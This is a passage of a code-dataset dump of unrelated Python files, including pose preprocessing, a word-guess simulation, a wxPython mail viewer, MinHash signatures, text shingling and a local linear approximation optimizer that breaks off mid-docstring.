Action('GetLensReview')\nGetLensReviewReport = Action('GetLensReviewReport')\nGetLensVersionDifference = Action('GetLensVersionDifference')\nGetMilestone = Action('GetMilestone')\nGetWorkload = Action('GetWorkload')\nListAnswers = Action('ListAnswers')\nListLensReviewImprovements = Action('ListLensReviewImprovements')\nListLensReviews = Action('ListLensReviews')\nListLenses = Action('ListLenses')\nListMilestones = Action('ListMilestones')\nListNotifications = Action('ListNotifications')\nListShareInvitations = Action('ListShareInvitations')\nListWorkloadShares = Action('ListWorkloadShares')\nListWorkloads = Action('ListWorkloads')\nUpdateAnswer = Action('UpdateAnswer')\nUpdateLensReview = Action('UpdateLensReview')\nUpdateShareInvitation = Action('UpdateShareInvitation')\nUpdateWorkload = Action('UpdateWorkload')\nUpdateWorkloadShare = Action('UpdateWorkloadShare')\nUpgradeLensReview = Action('UpgradeLensReview')\n","sub_path":"awacs/wellarchitected.py","file_name":"wellarchitected.py","file_ext":"py","file_size_in_byte":1890,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"234066032","text":"import numpy as np\r\nimport math\r\nimport cv2\r\nimport os\r\ndef convert_xy(axis_x,axis_y):\r\n    # linearly rescale the two 2D matrices into the 0-255 range\r\n    min_x=np.min(axis_x)\r\n    min_y=np.min(axis_y)\r\n    axis_x-=min_x\r\n    axis_y-=min_y\r\n    max_x = np.max(axis_x)\r\n    max_y = np.max(axis_y)\r\n    axis_x*=255/max_x\r\n    axis_y*=255/max_y\r\n    return axis_x,axis_y\r\ndef relative_pos(x0,y0,x,y):\r\n    # convert 2D Cartesian coordinates to 2D polar coordinates\r\n    distance=np.sqrt((x0-x)**2+(y0-y)**2)\r\n    angle=math.atan2(y-y0,x-x0)\r\n    return distance,angle\r\n\r\ndef copy_data(cir_coord):\r\n    # resize the 128*16 matrices to a uniform 224*224 so the CNN can process them\r\n    t=cir_coord.shape[2]\r\n    batch=cir_coord.shape[0]\r\n    true_coord=np.zeros((cir_coord.shape[0],cir_coord.shape[1],224,224,cir_coord.shape[4]))\r\n    for b in range(batch):\r\n        for i in range(cir_coord.shape[1]):\r\n            for j in 
range(cir_coord.shape[4]):\r\n                map=np.tile(cir_coord[b,i,:,:,j],14)\r\n                map1=np.zeros((224,224))\r\n                if t>224:\r\n                    map1=np.resize(cir_coord[b,i,:,:,j],(224,224))\r\n                else:\r\n                    p = np.zeros((224,16))\r\n                    mod=224%t\r\n                    div=224//t\r\n                    for q in range(div):\r\n                        p[q*t:(q+1)*t,:]=cir_coord[b,i,:,:,j]\r\n                    p[div*t:div*t+mod,:]=cir_coord[b,i,:,:,j][:mod,:]\r\n                    map1=np.resize(p,(224,224))\r\n                true_coord[b,i,:,:,j]=map1\r\n    return true_coord\r\n\r\n\r\ndef pre_treat_train(path):\r\n    # preprocess the raw training-set data\r\n    data=np.load(path)\r\n    t = data.shape[2]\r\n    batch=data.shape[0]\r\n    cir_coord = np.zeros((batch,4, t, 16, 2))  # 4 = the four key joints, t = frame count, 16 = the remaining joints, 2 = the two polar coordinates\r\n    for b in range(batch):\r\n        imcoords=[5,6,11,12]  # the four key joints: 5, 6, 11, 12\r\n        for n,imcoord in enumerate(imcoords):\r\n            for i in range(t):\r\n                data[b, 0, i, :, :][imcoord][0] += np.random.randint(-3, 3)\r\n                data[b, 2, i, :, :][imcoord][0] += np.random.randint(-3, 3)  # inject random noise\r\n                for coord_num in range(17):\r\n                    if coord_num != imcoord:\r\n                        data[b, 0, i, :, :][coord_num][0] += np.random.randint(-3, 3)\r\n                        data[b, 2, i, :, :][coord_num][0] += np.random.randint(-3, 3)\r\n                        distance, angle = relative_pos(data[b, 0, i, :, :][imcoord][0], data[b, 2, i, :, :][imcoord][0],\r\n                                                       data[b, 0, i, :, :][coord_num][0],\r\n                                                       data[b, 2, i, :, :][coord_num][0])\r\n                        cir_coord[b,n, i,coord_num-1,0],cir_coord[b,n, i,coord_num-1,1]=distance,angle\r\n            cir_coord[b,n,:,:,0],cir_coord[b,n,:,:,1]=convert_xy(cir_coord[b,n,:,:,0],cir_coord[b,n,:,:,1])\r\n    for b in range(batch):\r\n        for n in range(4):\r\n            cir_coord[b, n, :, :, 0] /= 255\r\n            cir_coord[b, n, :, :, 1] /= 255\r\n    # normalize the matrices before they enter the CNN\r\n    cir_coord = copy_data(cir_coord)\r\n    return cir_coord\r\n\r\ndef pre_treat_test(path):\r\n    # preprocess the raw test-set data\r\n    data = np.load(path)\r\n    t = data.shape[2]\r\n    batch = data.shape[0]\r\n    cir_coord = np.zeros((batch, 4, t, 16, 2))  # 4 = the four key joints, t = frame count, 16 = the remaining joints, 2 = the two polar coordinates\r\n    for b in range(batch):\r\n        imcoords = [5, 6, 11, 12]  # the four key joints: 5, 6, 11, 12\r\n        for n, imcoord in enumerate(imcoords):\r\n\r\n            for i in range(t):\r\n                for coord_num in range(17):\r\n                    if coord_num < imcoord:\r\n                        a = data[b, 2, i, :, 0]\r\n                        distance, angle = relative_pos(data[b, 0, i, :, :][imcoord][0],\r\n                                                       data[b, 2, i, :, :][imcoord][0] + np.random.randint(-3, 3),\r\n                                                       data[b, 0, i, :, :][coord_num][0],\r\n                                                       data[b, 2, i, :, :][coord_num][0])\r\n                        cir_coord[b, n, i, coord_num, 0], cir_coord[b, n, i, coord_num, 1] = distance, angle\r\n                    elif coord_num > imcoord:\r\n                        distance, angle = relative_pos(data[b, 0, i, :, :][imcoord][0],\r\n                                                       data[b, 2, i, :, :][imcoord][0],\r\n                                                       data[b, 0, i, :, :][coord_num][0],\r\n                                                       data[b, 2, i, :, :][coord_num][0])\r\n                        cir_coord[b, n, i, coord_num - 1, 0], cir_coord[b, n, i, coord_num - 1, 1] = distance, angle\r\n            cir_coord[b, n, :, :, 0], cir_coord[b, n, :, :, 1] = convert_xy(cir_coord[b, n, :, :, 0],\r\n                                                                            cir_coord[b, n, :, :, 1])\r\n    for b in range(batch):\r\n        for n in range(4):\r\n            cir_coord[b, n, :, :, 0]/=255\r\n            cir_coord[b, n, :, :, 1]/=255\r\n    cir_coord=copy_data(cir_coord)\r\n    return cir_coord\r\n\r\nif __name__ == '__main__':\r\n    sample_path = './data/train/000/P000S00G10B10H50UC022000LC021000A000R0_08251609.npy'\r\n    sample = pre_treat_train(sample_path)","sub_path":"utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":5902,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"177485853","text":"import random\r\nimport csv\r\n\r\nreps = int(raw_input(\"How many repetitions do you want to do? 
: \"))\r\n\r\nfo = open('GuessesAndWords650.csv','a')\r\n\r\nfor y in range(reps):\r\n\tall_words = []\r\n\tmaster_list = []\r\n\r\n\twith open('FourLetterUse.csv', 'r') as csvfile:\r\n\t\treader = csv.reader(csvfile)\r\n\t\tfor row in reader:\r\n\t\t\tall_words.append(row)\r\n\t\t\tmaster_list.append(row)\r\n\t\tall_words.pop(0)\r\n\t\tmaster_list.pop(0)\r\n\r\n\tmy_word = \"\".join(all_words[random.randrange(len(all_words))])\r\n\tletters = list(my_word)\r\n\r\n\tnum_guesses = 0\r\n\twhile True:\r\n\t\tnum_guesses += 1\r\n\t\t\"\"\"\r\n\t\tif num_guesses < 3:\r\n\t\t\tindex = random.randrange(len(master_list))\r\n\t\t\tcpuGuess = \"\".join(master_list[index])\r\n\t\t\tguess_letters = list(cpuGuess)\r\n\t\t\"\"\"\r\n\t\tif len(all_words) > 650:\r\n\t\t\tindex = random.randrange(len(master_list))\r\n\t\t\tcpuGuess = \"\".join(master_list[index])\r\n\t\t\tguess_letters = list(cpuGuess)\r\n\t\t\r\n\t\telse:\r\n\t\t\tindex = random.randrange(len(all_words))\r\n\t\t\tcpuGuess = \"\".join(all_words[index])\r\n\t\t\tguess_letters = list(cpuGuess)\r\n\t\t\tall_words.pop(index)\r\n\r\n\t\tif cpuGuess == my_word:\r\n\t\t\tbreak\r\n\t\t\r\n\t\tlets = 0\r\n\t\tfor l in guess_letters:\r\n\t\t\tif l in letters:\r\n\t\t\t\tlets += 1\r\n\r\n\t\tif lets == 0:\r\n\t\t\tx = 0\r\n\t\t\twhile x < len(all_words):\r\n\t\t\t\tl = list(str(all_words[x]))\r\n\t\t\t\tin_ = False\r\n\t\t\t\tfor char in guess_letters:\r\n\t\t\t\t\tif char in l:\r\n\t\t\t\t\t\tin_ = True\r\n\t\t\t\tif in_ == True:\r\n\t\t\t\t\tall_words.pop(x)\r\n\t\t\t\telse:\r\n\t\t\t\t\tx += 1\r\n\r\n\t\telse:\r\n\t\t\tx = 0\r\n\t\t\twhile x < len(all_words):\r\n\t\t\t\tl = list(str(all_words[x]))\r\n\t\t\t\tin_ = 0\r\n\t\t\t\tfor char in guess_letters:\r\n\t\t\t\t\tif char in l:\r\n\t\t\t\t\t\tin_ += 1\r\n\t\t\t\tif in_ < lets:\r\n\t\t\t\t\tall_words.pop(x)\r\n\t\t\t\telif in_ > lets:\r\n\t\t\t\t\tall_words.pop(x)\r\n\t\t\t\telse:\r\n\t\t\t\t\tx += 1\r\n\t\"\"\"\r\n\tprint \"It took \" + str(num_guesses) + \" guesses. 
The word was \" + my_word\r\n\t\"\"\"\r\n\tfo.write(str(num_guesses) + \",\" + my_word + \"\\n\")\r\n\r\nfo.close()\r\n","sub_path":"4LetterWordGame/simulation_game2.py","file_name":"simulation_game2.py","file_ext":"py","file_size_in_byte":1821,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"457134865","text":"# coding: utf-8\r\nimport os, sys\r\nrundir = os.path.dirname(os.path.dirname(os.path.abspath(sys.argv[0]))).replace(\"\\\\\", \"/\")\r\nsys.path.insert(0, os.path.join(rundir, 'base'))\r\nimport wx\r\nimport logfile, config\r\nfrom logfile import loginfo, logwarn, logerr\r\nimport viewhtml, mailparse\r\nfrom common import load_bitmap, load_image\r\nfrom picmenu import PicMenu\r\n\r\nclass MailViewFrame(wx.Frame):\r\n def __init__(self, parent, rundir, user, mailfile):\r\n self.rundir = rundir \r\n self.bmpdir = self.rundir + \"/bitmaps\"\r\n self.mailfile = mailfile\r\n self.user = user\r\n \r\n wx.Frame.__init__(self, parent, title=u'查看邮件', size=(800,600))\r\n self.parent = parent\r\n \r\n self.make_menu()\r\n self.make_toolbar()\r\n self.make_viewer(mailfile)\r\n self.make_statusbar()\r\n \r\n def make_menu(self):\r\n self.ID_MENU_EXIT = wx.NewId()\r\n self.ID_MENU_SOURCE = wx.NewId()\r\n self.ID_MENU_REPLY = wx.NewId()\r\n self.ID_MENU_FORWARD = wx.NewId()\r\n \r\n self.menubar = wx.MenuBar()\r\n \r\n self.filemenu = PicMenu(self)\r\n self.filemenu.Append(self.ID_MENU_EXIT, u'退出', 'exit.png')\r\n self.menubar.Append(self.filemenu, u'文件')\r\n \r\n self.viewmenu = PicMenu(self)\r\n self.viewmenu.Append(self.ID_MENU_SOURCE, u'邮件原文', 'contents.png')\r\n self.menubar.Append(self.viewmenu, u'查看')\r\n \r\n self.mailmenu = PicMenu(self)\r\n self.mailmenu.Append(self.ID_MENU_REPLY, u'回复', 'mail_reply.png')\r\n self.mailmenu.Append(self.ID_MENU_FORWARD, u'转发', 'mail_send.png')\r\n self.menubar.Append(self.mailmenu, u'邮件')\r\n \r\n self.SetMenuBar(self.menubar)\r\n \r\n self.Bind(wx.EVT_MENU, self.OnFileExit, id=self.ID_MENU_EXIT)\r\n self.Bind(wx.EVT_MENU, self.OnViewSource, id=self.ID_MENU_SOURCE)\r\n self.Bind(wx.EVT_MENU, self.OnMailReply, id=self.ID_MENU_REPLY)\r\n self.Bind(wx.EVT_MENU, self.OnMailForward, id=self.ID_MENU_FORWARD)\r\n \r\n def make_toolbar(self):\r\n self.ID_TOOLBAR_REPLY = wx.NewId()\r\n self.ID_TOOLBAR_FORWARD = wx.NewId()\r\n \r\n self.toolbar = wx.ToolBar(self, -1, wx.DefaultPosition, wx.Size(48, 48), style=wx.TB_HORIZONTAL|wx.TB_FLAT|wx.TB_TEXT)\r\n self.toolbar.SetToolBitmapSize(wx.Size(48,48))\r\n \r\n self.toolbar.AddLabelTool(self.ID_TOOLBAR_REPLY, u'回复', load_bitmap(self.bmpdir+'/32/mail_reply.png'), shortHelp=u'回复邮件', longHelp=u'回复邮件')\r\n self.toolbar.AddLabelTool(self.ID_TOOLBAR_FORWARD, u'转发', load_bitmap(self.bmpdir+'/32/mail_forward.png'), shortHelp=u'转发邮件', longHelp=u'转发邮件')\r\n \r\n self.toolbar.Realize()\r\n self.SetToolBar(self.toolbar)\r\n self.Bind(wx.EVT_TOOL, self.OnMailReply, id=self.ID_TOOLBAR_REPLY) \r\n self.Bind(wx.EVT_TOOL, self.OnMailForward, id=self.ID_TOOLBAR_FORWARD) \r\n \r\n \r\n def make_statusbar(self):\r\n self.statusbar = self.CreateStatusBar()\r\n self.statusbar.SetFieldsCount(2)\r\n self.SetStatusWidths([-1, -2])\r\n \r\n def make_viewer(self, mailfile):\r\n ret = mailparse.decode_mail(mailfile)\r\n #panel = wx.Panel(self)\r\n sizer = wx.BoxSizer(wx.VERTICAL)\r\n self.viewer = viewhtml.ViewHtml(self)\r\n self.viewer.set_text_auto(ret['html'], ret['plain'])\r\n sizer.Add(self.viewer, flag=wx.ALL|wx.EXPAND, border=0, proportion=1)\r\n \r\n if ret['attach']:\r\n 
self.attachctl = viewhtml.AttachListCtrl(self, self.rundir, wx.Size(-1,100))\r\n            sizer.Add(self.attachctl, flag=wx.ALL|wx.EXPAND, border=0, proportion=0)\r\n            homepath = os.path.join(config.cf.datadir, self.user)\r\n            for item in ret['attach']:\r\n                self.attachctl.add_file(item[0], {'home':homepath, 'file':mailfile, 'attach':item[0]})\r\n        \r\n        self.SetSizer(sizer)\r\n        \r\n    def OnFileExit(self, evt):\r\n        self.Destroy()\r\n        \r\n    def OnViewSource(self, evt):\r\n        pass\r\n        \r\n    def OnMailReply(self, evt):\r\n        pass\r\n        \r\n    def OnMailForward(self, evt):\r\n        pass\r\n    \r\nclass TestApp(wx.App):\r\n    def __init__(self):\r\n        wx.App.__init__(self, redirect=False)\r\n\r\n    def OnInit(self):\r\n        rundir = os.path.dirname(os.path.dirname(os.path.abspath(sys.argv[0]))).replace(\"\\\\\", \"/\")\r\n        mailfile = sys.argv[1]\r\n        frame = MailViewFrame(None, rundir, 'zhaowei', mailfile) \r\n        frame.Show(True)\r\n        self.SetTopWindow(frame)\r\n        \r\n        return True\r\n\r\n\r\nif __name__ == '__main__':\r\n    app = TestApp()\r\n    app.MainLoop()\r\n    \r\n    \r\n","sub_path":"cute/viewer.py","file_name":"viewer.py","file_ext":"py","file_size_in_byte":4720,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"99210406","text":"\"\"\"\r\nIn this module we calculate the signature of each document using the minhashing\r\ntechnique, utilizing a number of hash functions\r\n\"\"\"\r\n\r\nfrom random import randint\r\nfrom pandas import DataFrame, read_pickle\r\nimport numpy as np\r\nimport os\r\nfrom tqdm import tqdm\r\n\r\n\r\ndef gen_hash_func(rows, no_of_hash_functions=200):\r\n    \"\"\"This function creates parameters for given no of hash functions\r\n\r\n    Parameters\r\n    ----------\r\n    rows: Number of rows in shingle matrix (int)\r\n    no_of_hash_functions: Number of hash functions to generate for minhashing (Default: 200)\r\n\r\n    Returns\r\n    -------\r\n    list : list of functions which can be used as hashes[i](x)\r\n    \"\"\"\r\n\r\n    hashes = []\r\n    c = rows\r\n\r\n    for i in range(no_of_hash_functions):\r\n        # draw a and b once per hash function (and bind them as defaults) so each\r\n        # hash is deterministic; re-drawing them on every call would break MinHash\r\n        a, b = randint(1, 5*c), randint(1, 5*c)\r\n        def hash(x, a=a, b=b):\r\n            \"\"\"\r\n            This function calculates hash for given x\r\n            hash function format: (a*x+b)%c where\r\n            c: prime integer just greater than rows\r\n            a,b: random integer less than c\r\n            \"\"\"\r\n            return (a*x + b) % c\r\n        hashes.append(hash)\r\n\r\n    return hashes\r\n\r\n\r\ndef generate_signature_matrix(inci_mat, no_of_hash_functions=200):\r\n    \"\"\"It generates the signature matrix for the whole corpus\r\n\r\n    Parameters\r\n    ----------\r\n    inci_mat: incidence matrix generated by the shingling step (pandas.DataFrame)\r\n    no_of_hash_functions: number of hash functions to be used in generating signatures for documents. (Default: 200)\r\n\r\n    Returns\r\n    -------\r\n    returns dataframe containing signatures of every document\r\n    \"\"\"\r\n\r\n    # if pickle file exists, load and return it\r\n    if os.path.exists(\"sig_mat.pickle\"):\r\n        signature_matrix = read_pickle(\"sig_mat.pickle\")\r\n        print(\"Using already created sig_mat.pickle file\")\r\n        return signature_matrix\r\n\r\n    rows, cols = inci_mat.shape\r\n    hashes = gen_hash_func(rows, no_of_hash_functions)\r\n    signature_matrix = DataFrame(index=[i for i in range(\r\n        no_of_hash_functions)], columns=inci_mat.columns)\r\n\r\n    # core minhashing algorithm\r\n    for i in tqdm(range(rows)):\r\n        for j in inci_mat.columns:\r\n            if inci_mat.iat[i, j] == 1:\r\n                for k in range(no_of_hash_functions):\r\n                    if np.isnan(signature_matrix.iat[k, j]):\r\n                        signature_matrix.iat[k, j] = hashes[k](i)\r\n                    else:\r\n                        
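# keep the smallest hash value seen so far for this document -- the core MinHash update\r\n                        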
signature_matrix.iat[k, j] = min(\r\n signature_matrix.iat[k, j], hashes[k](i))\r\n\r\n print(\"Saving generated signature_matrix to pickle file...\")\r\n signature_matrix.to_pickle(\"sig_mat.pickle\")\r\n print(\"Saved to sig_mat.pickle\")\r\n return signature_matrix\r\n","sub_path":"Code/minhashing.py","file_name":"minhashing.py","file_ext":"py","file_size_in_byte":2724,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"310766879","text":"import os\nimport urllib.request\nimport time\nfrom urllib.parse import quote\nfrom TRS_backend.FeatureExtraction.ImageFeatureExtraction.Canny_detection import canny_detection\nfrom TRS_backend.FeatureExtraction.ImageFeatureExtraction.Widget_Recognition import widget_recognition\n\n\ndef download_img(image_url):\n timestamp = str(int(time.time()))\n curpath = os.path.dirname(os.path.realpath(__file__))\n file_path = curpath + '\\\\images\\\\' + timestamp + image_url[len(image_url) - 4:]\n try:\n urllib.request.urlretrieve(quote(image_url, safe='/:?='),\n filename=file_path) # 利用urllib.request.urltrieve方法下载图片\n return timestamp + os.path.splitext(image_url)[1]\n except IOError as e:\n print(1, e)\n except Exception as e:\n print(2, e)\n\n\ndef image_feature_extraction(image_url_list, widget_information_list):\n image_name_list = []\n for image_url in image_url_list:\n img_name = download_img(image_url)\n image_name_list.append(img_name)\n canny_detection(img_name)\n time.sleep(1)\n result_list = widget_recognition(image_name_list, widget_information_list)\n return result_list\n","sub_path":"TRS_backend/FeatureExtraction/ImageFeatureExtraction/image_feature_extraction.py","file_name":"image_feature_extraction.py","file_ext":"py","file_size_in_byte":1195,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"552646078","text":"\"\"\"\nPalindrome Partitioning\nGiven a string s, partition s such that every substring of the partition is a palindrome. 
Return all possible palindrome partitioning of s.\n\nA palindrome string is a string that reads the same backward as forward.\n\n\n\nExample 1:\n\nInput: s = \"aab\"\nOutput: [[\"a\",\"a\",\"b\"],[\"aa\",\"b\"]]\nExample 2:\n\nInput: s = \"a\"\nOutput: [[\"a\"]]\n\n\nConstraints:\n\n1 <= s.length <= 16\ns contains only lowercase English letters.\n\"\"\"\nfrom typing import List\n\n\nclass Solution:\n    def dfs(self, s, partition, result):\n        if not s:\n            ## base case aka stop condition\n            # add into result when we meet an empty string\n            result.append(partition[::])\n            return\n        ## general cases:\n        # scan each possible split index\n\n        for i in range(1, len(s) + 1):\n\n            prefix, postfix = s[:i], s[i:]\n\n            if self.is_palindrome(prefix):\n                # current prefix is a palindrome, keep trying to make more partitions in DFS\n                partition.append(prefix)\n                self.dfs(postfix, partition, result)\n                partition.pop()\n\n    def is_palindrome(self, s):\n\n        # helper function to check palindrome\n        return s == s[::-1]\n\n    def partition(self, s: str) -> List[List[str]]:\n        # Solution 1 - 660 ms\n        \"\"\"\n        # record for solution\n        result = []\n\n        # make palindrome partition in DFS\n        self.dfs(s, [], result)\n        return result\n        \"\"\"\n        # Solution 2 - 44 ms\n        if not s:\n            return []\n        dp = {0: [[]], 1: [[s[0]]]}\n        for i in range(1, len(s)):\n            dp[i + 1] = []\n            for j in range(0, i + 1):\n                if self.is_palindrome(s[j:i + 1]):\n                    for prev in dp[j]:\n                        dp[i + 1].append(prev + [s[j:i + 1]])\n        return dp[len(s)]\n\n\n# Main Call\ns = \"aab\"\nsolution = Solution()\nprint(solution.partition(s))\n","sub_path":"src/matrix/partition.py","file_name":"partition.py","file_ext":"py","file_size_in_byte":1932,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"43969114","text":"\n\ndef canonize(source):\n    stop_symbols = '@#$%\".,!?:;-\\n\\r()—1234567890\\'*'\n\n    stop_words = (u'это', u'как', u'так',\n                  u'и', u'в', u'над',\n                  u'к', u'до', u'не',\n                  u'на', u'но', u'за',\n                  u'то', u'с', u'ли',\n                  u'а', u'во', u'от',\n                  u'со', u'для', u'о',\n                  u'же', u'ну', u'вы',\n                  u'бы', u'что', u'кто',\n                  u'он', u'она', u'у', u'из',\n                  u'это', u'эту', u'эта')\n\n    return ([x for x in [y.strip(stop_symbols) for y in source.lower().split()] if x and (x not in stop_words)])\n\ndef genshingle(source, shingleLen=4):\n    import binascii\n    if len(source) < shingleLen:\n        source += [\"any\"] * (shingleLen - len(source))\n    out = []\n    for i in range(len(source)-(shingleLen-1)):\n        out.append(binascii.crc32(' '.join( [x for x in source[i:i+shingleLen]]).encode('utf-8')))\n    if len(out) == 0:\n        pass\n    return out\n\ndef compare (source1,source2):\n    same = 0\n    for i in range(len(source1)):\n        if source1[i] in source2:\n            same = same + 1\n    return same*2/float(len(source1) + len(source2))*100\n\n\ndef compareText(text1, text2):\n    k = 2  # Will assume that if the lengths of the texts after canonization differ by more than k times, then\n    # the texts are different\n    x1 = canonize(text1)\n    x2 = canonize(text2)\n    if len(x1) > k * len(x2) or len(x2) > k * len(x1):\n        return False\n    shinglelen = min(4, len(x1), len(x2))\n    return compare(genshingle(x1, shinglelen), genshingle(x2, shinglelen)) > 0\n\nif __name__ == '__main__':\n    file1 = \"text1.txt\"\n    encod = \"cp1251\"\n    with open(file1, encoding=encod) as txt1:\n        try:\n            ttt1 = txt1.read()\n        except UnicodeDecodeError as e:\n            print(e.encoding)\n            print(e.reason)\n            print(e.object)\n            print(e.start)\n            print(e.end)\n\n\n    file2 = \"text3.txt\"\n    with open(file2, encoding=encod) as txt2:\n        ttt2 = txt2.read()\n\n    x1 = canonize(ttt1)\n    x2 = 
canonize(ttt2)\n    y1 = genshingle(x1,3)\n    y2 = genshingle(x2,3)\n    print(x1, x2)\n    print(y1, y2)\n    print(compare(x1, x2))\n    print(compare(y1,y2))\n\n\n","sub_path":"difftexts.py","file_name":"difftexts.py","file_ext":"py","file_size_in_byte":2295,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"172835475","text":"import flask\nimport scrabble\nfrom flask import Flask, flash, redirect, render_template, \\\nrequest, url_for\n\n\napp = flask.Flask(__name__)\napp.secret_key = 'bacon'\n\n\n\n\n# Routes\n\n@app.route(\"/\", methods=['GET', 'POST'])\ndef index():\n    if request.method == 'POST':\n        scrabble.scrabble_output(request)\n\n    return flask.render_template('index.html')\n\n\n@app.errorhandler(404)\ndef page_not_found(error):\n    return flask.render_template('404.html'), 404\n\napp.debug = True\napp.run()\n\n\n# import pdb; pdb.set_trace()","sub_path":"scrabble_app/scrabble_app.py","file_name":"scrabble_app.py","file_ext":"py","file_size_in_byte":520,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"622337958","text":"from copy import deepcopy\nfrom time import time\n\nfrom yaglm.opt.stopping import check_decreasing_loss, check_no_change\nfrom yaglm.opt.utils import safe_concat\n\n\ndef solve_lla(sub_prob, penalty_func,\n              init, init_upv=None,\n              sp_init=None, sp_upv_init=None, sp_other_data=None,\n              transform=abs, objective=None,\n              n_steps=1, xtol=1e-4, atol=None, rtol=None,\n              tracking_level=1, verbosity=0):\n    \"\"\"\n    Runs the local linear approximation algorithm. We only need the concave penalty function and a subroutine that solves the weighted Lasso-like subproblems.\n\n    Parameters\n    ----------\n    sub_prob:\n        An object that solves the weighted subproblems.\n\n    penalty_func: fclsp.penalty.FoldedPenalty\n        The penalty function applied to the possibly transformed values.\n\n    init: array-like\n        The value at which to initialize the LLA algorithm.\n\n    init_upv: None, array-like\n        The value at which to initialize the (optional) unpenalized variable.\n\n    sp_init: None, array-like\n        (Optional) Value at which to initialize the first weighted subproblem.\n\n    sp_upv_init: None, array-like\n        (Optional) Value at which to initialize the first weighted subproblem for the unpenalized variable.\n\n    sp_other_data: None\n        (Optional) Value at which to initialize the other subproblem data.\n\n    transform: callable\n        Transforms the penalized variable into the object to which we apply the concave penalty.\n\n    objective: None, callable(value, upv) -> float\n        (Optional) Evaluates the full objective function.\n\n    n_steps: int\n        Number of LLA steps to take.\n\n    xtol: float, None\n        The change in x tolerance stopping criterion based on the L_inf norm.\n\n    atol: float, None\n        Absolute tolerance for loss based stopping criterion.\n\n    rtol: float, None\n        Relative tolerance for loss based stopping criterion.\n\n    tracking_level: int\n        How much optimization data to store at each step. Lower values mean less information is stored.\n\n    verbosity: int\n        How much information to print out. Lower values mean less printing.\n\n    Output\n    ------\n    solution, solution_upv, sp_other_data, opt_info\n\n    solution: array-like\n        The solution of the penalized variable.\n\n    solution_upv: None, array-like\n        The solution of the unpenalized variable.\n\n    sp_other_data:\n        Other data output by the subproblem solver.\n\n    opt_info: dict\n        Data tracked during the optimization procedure e.g. 
the loss function.\n\n\n    References\n    ----------\n    Fan, J., Xue, L. and Zou, H., 2014. Strong oracle optimality of folded concave penalized estimation. Annals of statistics, 42(3), p.819.\n    \"\"\"\n\n    ######################\n    # format initializer #\n    ######################\n\n    current = deepcopy(init)\n    current_upv = deepcopy(init_upv)\n    T = transform(current)\n\n    if xtol is not None:\n        if current_upv is not None:\n            prev = deepcopy(safe_concat(current, current_upv))\n        else:\n            prev = deepcopy(current)\n\n    ##############################\n    # optimization data tracking #\n    ##############################\n    opt_info = {}\n\n    if (atol is not None or rtol is not None) and tracking_level == 0:\n        tracking_level = 1\n\n    if tracking_level >= 1:\n        if objective is None:\n            raise ValueError(\"The objective function must be provided\")\n\n        opt_info['obj'] = [objective(value=current, upv=current_upv)]\n\n    if tracking_level >= 2:\n        if xtol is not None:\n            opt_info['diff_norm'] = []  # difference between successive iterates\n\n    #################\n    # Run algorithm #\n    #################\n\n    start_time = time()\n\n    step = 0  # in case n_steps = 0\n    x_stop = False\n    obj_stop = False\n    for step in range(int(n_steps)):\n\n        if verbosity >= 1:\n            print(\"Step {}, {:1.2f} seconds after start\".\n                  format(step + 1, time() - start_time))\n\n        ###############\n        # Make update #\n        ###############\n\n        # setup initialization for subproblem solver\n        if sp_init is None:\n            sp_init = current\n\n        if sp_upv_init is None:\n            sp_upv_init = current_upv\n\n        # majorize concave penalty\n        # T has already been computed as T = transform(current)\n        weights = penalty_func.grad(T)\n\n        # solve weighted Lasso problem\n        current, current_upv, sp_other_data = \\\n            sub_prob.solve(weights=weights,\n                           sp_init=sp_init,\n                           sp_upv_init=sp_upv_init,\n                           sp_other_data=sp_other_data)\n\n        ############################################\n        # check stopping conditions and track data #\n        ############################################\n\n        T = None  # tells us to compute T below\n\n        # track objective function data\n        if tracking_level >= 1:\n            opt_info['obj'].append(objective(value=current, upv=current_upv))\n\n        # x change criteria\n        if xtol is not None:\n            if current_upv is not None:\n                _current = safe_concat(current, current_upv)\n            else:\n                _current = current\n\n            x_stop, diff_norm = check_no_change(current=_current,\n                                                prev=prev,\n                                                tol=xtol,\n                                                norm='max')\n\n            if tracking_level >= 2:\n                opt_info['diff_norm'].append(diff_norm)\n\n        if tracking_level >= 1:\n            # objective function change criterion\n            # if the objective has stopped decreasing we are done!\n            obj_stop = check_decreasing_loss(current_loss=opt_info['obj'][-1],\n                                             prev_loss=opt_info['obj'][-2],\n                                             abs_tol=atol, rel_tol=rtol,\n                                             on_increase='ignore')\n\n        # maybe stop the algorithm\n        if x_stop or obj_stop:\n            break\n        elif xtol is not None:\n\n            # set prev for next iteration\n            if current_upv is not None:\n                prev = deepcopy(safe_concat(current, current_upv))\n            else:\n                prev = deepcopy(current)\n\n        # compute transform for next iteration if it has not already\n        # been computed\n        if T is None:\n            T = transform(current)\n\n    opt_info['runtime'] = time() - start_time\n    opt_info['final_step'] = step\n    opt_info['obj_stop'] = obj_stop\n    opt_info['x_stop'] = x_stop\n\n    return current, current_upv, sp_other_data, opt_info\n\n\nclass WeightedProblemSolver(object):\n\n    def solve(self, weights, sp_init=None,\n              sp_upv_init=None, other_data=None):\n        \"\"\"\n        Solves the weighted subproblem.\n\n        Parameters\n        ----------\n        weights: array-like\n            Weights for the 
